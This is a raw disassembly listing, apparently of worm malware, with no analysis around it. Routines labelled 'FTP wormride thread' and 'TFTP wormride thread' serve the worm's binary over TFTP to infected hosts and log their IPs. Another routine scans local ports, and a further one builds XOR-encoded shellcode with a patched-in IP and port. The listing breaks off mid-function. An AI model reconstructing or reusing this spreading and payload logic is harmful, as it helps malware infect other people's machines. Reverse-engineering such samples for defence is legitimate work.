loc_411A5F: ; CODE XREF: sub_411A09+4D�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6D8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411A8A
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A8A: ; CODE XREF: sub_411A09+78�j
push offset dword_41C6CC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411AEE
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411AF5
loc_411AEE: ; CODE XREF: sub_411A09+DA�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411AF5: ; CODE XREF: sub_411A09+E3�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6C8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411B20
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411B20: ; CODE XREF: sub_411A09+10E�j
call sub_410422
push eax
push offset dword_41C6BC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411B8B
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411B8F
loc_411B8B: ; CODE XREF: sub_411A09+177�j
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411B8F: ; CODE XREF: sub_411A09+180�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6B8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411BB7
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411BB7: ; CODE XREF: sub_411A09+1A8�j
push 1
pop eax
locret_411BBA: ; CODE XREF: sub_411A09+1B�j
; sub_411A09+51�j ...
leave
retn
sub_411A09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411BBC proc near ; CODE XREF: sub_411D59+6�p
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_8], 1
jmp short loc_411C04
; ---------------------------------------------------------------------------
loc_411BFD: ; CODE XREF: sub_411BBC:loc_411CAB�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_411C04: ; CODE XREF: sub_411BBC+3F�j
cmp [ebp+var_8], 0FFFFh
jnb loc_411CB0
push 0Ah
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call sub_416F7A ; _itoa
add esp, 0Ch
push 0FFFFFFFFh
push 0
lea eax, [ebp+var_18]
push eax
push offset a127_0_0_1 ; "127.0.0.1"
call sub_4050EA
add esp, 10h
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jz short loc_411CAB
push [ebp+var_1C4]
call sub_411A09
pop ecx
test eax, eax
jz short loc_411C9F
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
cmp [ebp+var_4], 0
jnz short loc_411C76
push 2
lea eax, [ebp+var_18]
push eax
push [ebp+var_10]
call sub_404871
add esp, 0Ch
jmp short loc_411C9F
; ---------------------------------------------------------------------------
loc_411C76: ; CODE XREF: sub_411BBC+A5�j
push 2
lea eax, [ebp+var_18]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_411C9F
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411C9F: ; CODE XREF: sub_411BBC+98�j
; sub_411BBC+B8�j ...
push [ebp+var_1C4]
call sub_4053B1
pop ecx
loc_411CAB: ; CODE XREF: sub_411BBC+88�j
jmp loc_411BFD
; ---------------------------------------------------------------------------
loc_411CB0: ; CODE XREF: sub_411BBC+4F�j
cmp [ebp+var_10], 0
jnz short loc_411CC9
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411CC9: ; CODE XREF: sub_411BBC+F8�j
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset unk_41C6DC
lea eax, [ebp+var_1BC]
push eax
call sub_40D53F
add esp, 0Ch
loc_411CE5: ; CODE XREF: sub_411BBC:loc_411D3C�j
push 3E8h
push [ebp+var_10]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
cmp [ebp+var_1C8], 0
jz short loc_411D2E
cmp [ebp+var_1C8], 0FFFFFFFFh
jz short loc_411D2E
push [ebp+var_1C8]
push offset sub_41113B
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_411D2E
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_411D2E: ; CODE XREF: sub_411BBC+145�j
; sub_411BBC+14E�j ...
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jz short loc_411D3C
jmp short loc_411D3E
; ---------------------------------------------------------------------------
loc_411D3C: ; CODE XREF: sub_411BBC+17C�j
jmp short loc_411CE5
; ---------------------------------------------------------------------------
loc_411D3E: ; CODE XREF: sub_411BBC+17E�j
push [ebp+var_10]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_411D55: ; CODE XREF: sub_411BBC+DE�j
; sub_411BBC+108�j
leave
retn 4
sub_411BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D59 proc near ; DATA XREF: sub_411D68+4E�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_411BBC
pop ebp
retn 4
sub_411D59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D68 proc near ; CODE XREF: sub_40A9CF+70F�p
; sub_40A9CF+735�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_4042FB
test eax, eax
jz short loc_411D77
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D77: ; CODE XREF: sub_411D68+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_411D8D
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D8D: ; CODE XREF: sub_411D68+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFtpWormrideThr ; "FTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411D59
call sub_4095A4
add esp, 10h
locret_411DC3: ; CODE XREF: sub_411D68+D�j
; sub_411D68+23�j
leave
retn
sub_411D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411DC5 proc near ; DATA XREF: sub_4123F6+43�o
var_DAC = dword ptr -0DACh
var_DA8 = dword ptr -0DA8h
var_DA4 = dword ptr -0DA4h
var_DA0 = byte ptr -0DA0h
var_D9C = dword ptr -0D9Ch
var_D98 = byte ptr -0D98h
var_D94 = dword ptr -0D94h
var_D90 = dword ptr -0D90h
var_D8C = dword ptr -0D8Ch
var_D88 = dword ptr -0D88h
var_D84 = dword ptr -0D84h
var_D80 = byte ptr -0D80h
var_D7C = dword ptr -0D7Ch
var_D70 = byte ptr -0D70h
var_D6F = byte ptr -0D6Fh
var_D6E = byte ptr -0D6Eh
var_D6D = byte ptr -0D6Dh
var_D6C = byte ptr -0D6Ch
var_B6C = dword ptr -0B6Ch
var_B68 = dword ptr -0B68h
var_B64 = dword ptr -0B64h
var_B60 = dword ptr -0B60h
var_B5C = dword ptr -0B5Ch
var_B58 = dword ptr -0B58h
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_1B0 = word ptr -1B0h
var_1AE = word ptr -1AEh
var_1AC = dword ptr -1ACh
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_19A = byte ptr -19Ah
var_199 = byte ptr -199h
var_11C = byte ptr -11Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DACh
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_358]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0
push 2
push 2
call ds:dword_417218 ; socket
mov [ebp+var_108], eax
cmp [ebp+var_108], 0FFFFFFFFh
jnz short loc_411E1D
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411E1D: ; CODE XREF: sub_411DC5+43�j
lea eax, [ebp+var_104]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_1B0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1B0], 2
push 45h
call ds:dword_417238 ; ntohs
mov [ebp+var_1AE], ax
lea eax, [ebp+var_104]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp+var_1AC], eax
mov [ebp+var_1A0], 1
push 4
lea eax, [ebp+var_1A0]
push eax
push 4
push 0FFFFh
push [ebp+var_108]
call ds:dword_417204 ; setsockopt
push 10h
lea eax, [ebp+var_1B0]
push eax
push [ebp+var_108]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_411EC2
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411EC2: ; CODE XREF: sub_411DC5+E8�j
push offset aRb ; "rb"
push offset dword_41EBFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0
jnz short loc_411F01
push [ebp+var_108]
call ds:dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411F01: ; CODE XREF: sub_411DC5+11B�j
mov eax, [ebp+var_358]
push dword ptr [eax]
push offset unk_41C788
lea eax, [ebp+var_354]
push eax
call sub_40D53F
add esp, 0Ch
push 2
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_4], eax
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push 80h
push 0
lea eax, [ebp+var_19C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_411F66: ; CODE XREF: sub_411DC5:loc_412084�j
; sub_411DC5:loc_4123C6�j
mov [ebp+var_B64], 1
and [ebp+var_B60], 0
and [ebp+var_B5C], 0
loc_411F7E: ; CODE XREF: sub_411DC5+234�j
and [ebp+var_B68], 0
jmp short loc_411F94
; ---------------------------------------------------------------------------
loc_411F87: ; CODE XREF: sub_411DC5:loc_411FB9�j
mov eax, [ebp+var_B68]
inc eax
mov [ebp+var_B68], eax
loc_411F94: ; CODE XREF: sub_411DC5+1C0�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnb short loc_411FBB
mov eax, [ebp+var_B68]
mov eax, [ebp+eax*4+var_B58]
cmp eax, [ebp+var_108]
jnz short loc_411FB9
jmp short loc_411FBB
; ---------------------------------------------------------------------------
loc_411FB9: ; CODE XREF: sub_411DC5+1F0�j
jmp short loc_411F87
; ---------------------------------------------------------------------------
loc_411FBB: ; CODE XREF: sub_411DC5+1DB�j
; sub_411DC5+1F2�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnz short loc_411FF5
cmp [ebp+var_B5C], 200h
jnb short loc_411FF5
mov eax, [ebp+var_B68]
mov ecx, [ebp+var_108]
mov [ebp+eax*4+var_B58], ecx
mov eax, [ebp+var_B5C]
inc eax
mov [ebp+var_B5C], eax
loc_411FF5: ; CODE XREF: sub_411DC5+202�j
; sub_411DC5+20E�j
xor eax, eax
test eax, eax
jnz short loc_411F7E
lea eax, [ebp+var_B64]
push eax
push 0
push 0
lea eax, [ebp+var_B5C]
push eax
push 0
call ds:dword_41722C ; select
test eax, eax
jle loc_4123B8
mov [ebp+var_D84], 10h
mov al, ds:byte_41DF00
mov [ebp+var_D70], al
mov ecx, 80h
xor eax, eax
lea edi, [ebp+var_D6F]
rep stosd
stosw
stosb
lea eax, [ebp+var_D84]
push eax
lea eax, [ebp+var_D80]
push eax
push 0
push 80h
lea eax, [ebp+var_19C]
push eax
push [ebp+var_108]
call ds:dword_417258 ; recvfrom
mov [ebp+var_B6C], eax
cmp [ebp+var_B6C], 0
jz short loc_412084
cmp [ebp+var_B6C], 0FFFFFFFFh
jnz short loc_412089
loc_412084: ; CODE XREF: sub_411DC5+2B4�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_412089: ; CODE XREF: sub_411DC5+2BD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_4121C0
movsx eax, [ebp+var_19B]
cmp eax, 1
jnz loc_4121C0
lea eax, [ebp+var_19C]
mov [ebp+var_D88], eax
lea eax, [ebp+var_19C]
mov [ebp+var_D8C], eax
mov eax, [ebp+var_D88]
inc eax
inc eax
mov [ebp+var_D88], eax
mov eax, [ebp+var_D8C]
inc eax
inc eax
mov [ebp+var_D8C], eax
push [ebp+var_D8C]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_D8C]
lea eax, [ecx+eax+1]
mov [ebp+var_D8C], eax
push offset aOctet ; "octet"
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_D8C]
push offset aOctet ; "octet"
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_41213F
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 13h
push offset dword_41C76C
push [ebp+var_108]
call ds:dword_417250 ; sendto
jmp short loc_4121BB
; ---------------------------------------------------------------------------
loc_41213F: ; CODE XREF: sub_411DC5+354�j
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
and [ebp+var_D6E], 0
mov [ebp+var_D6D], 1
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D90], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D90]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call ds:dword_417250 ; sendto
loc_4121BB: ; CODE XREF: sub_411DC5+378�j
jmp loc_4123B8
; ---------------------------------------------------------------------------
loc_4121C0: ; CODE XREF: sub_411DC5+2CD�j
; sub_411DC5+2DD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_412396
movsx eax, [ebp+var_19B]
cmp eax, 4
jnz loc_412396
mov al, [ebp+var_19A]
mov [ebp+var_DA0], al
mov al, [ebp+var_199]
mov [ebp+var_D98], al
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
movzx eax, [ebp+var_D98]
cmp eax, 0FFh
jnz short loc_412242
mov al, [ebp+var_DA0]
add al, 1
mov [ebp+var_DA0], al
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
and [ebp+var_D98], 0
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
jmp short loc_412268
; ---------------------------------------------------------------------------
loc_412242: ; CODE XREF: sub_411DC5+44C�j
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
mov al, [ebp+var_D98]
add al, 1
mov [ebp+var_D98], al
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
loc_412268: ; CODE XREF: sub_411DC5+47B�j
movzx eax, [ebp+var_DA0]
shl eax, 8
movzx ecx, [ebp+var_D98]
lea eax, [eax+ecx-1]
mov [ebp+var_D9C], eax
push 0
mov eax, [ebp+var_D9C]
shl eax, 9
push eax
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D94], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D94]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call ds:dword_417250 ; sendto
cmp [ebp+var_D94], 0
jnz loc_412394
mov eax, [ebp+var_D9C]
shl eax, 9
cmp eax, [ebp+var_4]
jb loc_412394
mov eax, [ebp+var_D7C]
mov [ebp+var_DA8], eax
push [ebp+var_DA8]
push offset dword_41EBE0
call sub_409C9D
pop ecx
pop ecx
mov [ebp+var_DA4], eax
mov eax, [ebp+var_DA4]
cmp eax, [ebp+var_DA8]
jz short loc_412394
push 1
push offset dword_41EBE4
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_DAC], eax
push 10h
push [ebp+var_D7C]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_11C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_11C]
push eax
mov eax, [ebp+var_DAC]
inc eax
push eax
push offset aWormride ; "wormride"
push offset unk_41C730
push offset dword_41DB88
call sub_40D4AB
add esp, 14h
loc_412394: ; CODE XREF: sub_411DC5+52D�j
; sub_411DC5+53F�j ...
jmp short loc_4123B8
; ---------------------------------------------------------------------------
loc_412396: ; CODE XREF: sub_411DC5+404�j
; sub_411DC5+414�j
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 9
push offset dword_41C724
push [ebp+var_108]
call ds:dword_417250 ; sendto
loc_4123B8: ; CODE XREF: sub_411DC5+252�j
; sub_411DC5:loc_4121BB�j ...
mov eax, [ebp+var_358]
cmp dword ptr [eax+4], 0
jz short loc_4123C6
jmp short loc_4123CB
; ---------------------------------------------------------------------------
loc_4123C6: ; CODE XREF: sub_411DC5+5FD�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_4123CB: ; CODE XREF: sub_411DC5+5FF�j
push [ebp+var_10C]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_108]
call ds:dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
loc_4123F1: ; CODE XREF: sub_411DC5+53�j
; sub_411DC5+F8�j ...
pop edi
leave
retn 4
sub_411DC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123F6 proc near ; CODE XREF: sub_40A9CF+726�p
; sub_40A9CF+742�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412410
jmp short locret_412446
; ---------------------------------------------------------------------------
loc_412410: ; CODE XREF: sub_4123F6+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aTftpWormrideTh ; "TFTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411DC5
call sub_4095A4
add esp, 10h
locret_412446: ; CODE XREF: sub_4123F6+18�j
leave
retn
sub_4123F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412448 proc near ; CODE XREF: sub_4125DF+88�p
; sub_4125DF+AD�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_41245A
; ---------------------------------------------------------------------------
loc_412453: ; CODE XREF: sub_412448:loc_41249A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41245A: ; CODE XREF: sub_412448+9�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_41249C
and [ebp+var_8], 0
jmp short loc_41246F
; ---------------------------------------------------------------------------
loc_412468: ; CODE XREF: sub_412448:loc_412498�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_41246F: ; CODE XREF: sub_412448+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_C]
jnb short loc_41249A
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_10]
xor eax, ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_412498
push 1
pop eax
jmp short locret_41249E
; ---------------------------------------------------------------------------
loc_412498: ; CODE XREF: sub_412448+49�j
jmp short loc_412468
; ---------------------------------------------------------------------------
loc_41249A: ; CODE XREF: sub_412448+2D�j
jmp short loc_412453
; ---------------------------------------------------------------------------
loc_41249C: ; CODE XREF: sub_412448+18�j
xor eax, eax
locret_41249E: ; CODE XREF: sub_412448+4E�j
leave
retn
sub_412448 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124A0 proc near ; CODE XREF: sub_4125DF+36�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_4], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
cmp [ebp+arg_8], 1
jnz short loc_41250C
cmp [ebp+arg_4], 0B2h
jnb short loc_4124CC
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_4124CC: ; CODE XREF: sub_4124A0+23�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C964
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 8Fh
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 88h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
jmp loc_41259C
; ---------------------------------------------------------------------------
loc_41250C: ; CODE XREF: sub_4124A0+1A�j
cmp [ebp+arg_8], 2
jnz short loc_412554
cmp [ebp+arg_4], 0C6h
jnb short loc_412522
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_412522: ; CODE XREF: sub_4124A0+79�j
mov [ebp+var_C], 0C6h
push [ebp+var_C]
push offset dword_41C89C
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 89h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0C0h
mov [ebp+var_8], eax
jmp short loc_41259C
; ---------------------------------------------------------------------------
loc_412554: ; CODE XREF: sub_4124A0+70�j
cmp [ebp+arg_4], 0B2h
jnb short loc_412561
xor eax, eax
jmp short locret_4125DD
; ---------------------------------------------------------------------------
loc_412561: ; CODE XREF: sub_4124A0+BB�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C7E8
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 86h
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 8Dh
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
loc_41259C: ; CODE XREF: sub_4124A0+67�j
; sub_4124A0+B2�j
cmp [ebp+var_4], 0
jz short loc_4125B0
push [ebp+arg_C]
call ds:dword_417244 ; inet_addr
mov ecx, [ebp+var_4]
mov [ecx], eax
loc_4125B0: ; CODE XREF: sub_4124A0+100�j
cmp [ebp+var_10], 0
jz short loc_4125CC
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; ntohs
mov ecx, [ebp+var_10]
mov [ecx], ax
loc_4125CC: ; CODE XREF: sub_4124A0+114�j
cmp [ebp+var_8], 0
jz short loc_4125DA
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_14]
mov [eax], ecx
loc_4125DA: ; CODE XREF: sub_4124A0+130�j
mov eax, [ebp+var_C]
locret_4125DD: ; CODE XREF: sub_4124A0+27�j
; sub_4124A0+7D�j ...
leave
retn
sub_4124A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125DF proc near ; CODE XREF: sub_410649+8B�p
; sub_410B52+41�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_4], 1Ch
jnb short loc_4125F2
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_4125F2: ; CODE XREF: sub_4125DF+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 1Ch
mov [ebp+var_4], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push 1E4h
push [ebp+var_4]
call sub_4124A0
add esp, 18h
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_41262D
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_41262D: ; CODE XREF: sub_4125DF+45�j
push 1Ch
push offset loc_41C7C8
push [ebp+var_10]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, ds:dword_41CB98
mov [ebp+var_8], eax
jmp short loc_412659
; ---------------------------------------------------------------------------
loc_412649: ; CODE XREF: sub_4125DF+94�j
; sub_4125DF:loc_41269A�j
call sub_410422
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ds:dword_41CB98, eax
loc_412659: ; CODE XREF: sub_4125DF+68�j
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_8]
push eax
call sub_412448
add esp, 14h
test eax, eax
jz short loc_412675
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_412675: ; CODE XREF: sub_4125DF+92�j
mov eax, [ebp+var_14]
xor eax, [ebp+var_8]
mov [ebp+var_1C], eax
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_1C]
push eax
call sub_412448
add esp, 14h
test eax, eax
jnz short loc_41269A
jmp short loc_41269C
; ---------------------------------------------------------------------------
loc_41269A: ; CODE XREF: sub_4125DF+B7�j
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_41269C: ; CODE XREF: sub_4125DF+B9�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
mov [eax+3], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_1C]
mov [eax+9], ecx
mov al, ds:byte_41CB95
mov byte ptr [ebp+var_C], al
jmp short loc_4126C8
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4125DF+104�j
call sub_410461
mov byte ptr [ebp+var_C], al
mov al, byte ptr [ebp+var_C]
mov ds:byte_41CB95, al
loc_4126C8: ; CODE XREF: sub_4125DF+D7�j
push [ebp+var_C]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_14]
push [ebp+var_4]
call sub_412448
add esp, 14h
test eax, eax
jz short loc_4126E5
jmp short loc_4126B8
; ---------------------------------------------------------------------------
loc_4126E5: ; CODE XREF: sub_4125DF+102�j
mov eax, [ebp+var_10]
mov cl, byte ptr [ebp+var_C]
mov [eax+12h], cl
and [ebp+var_18], 0
jmp short loc_4126FB
; ---------------------------------------------------------------------------
loc_4126F4: ; CODE XREF: sub_4125DF+137�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_4126FB: ; CODE XREF: sub_4125DF+113�j
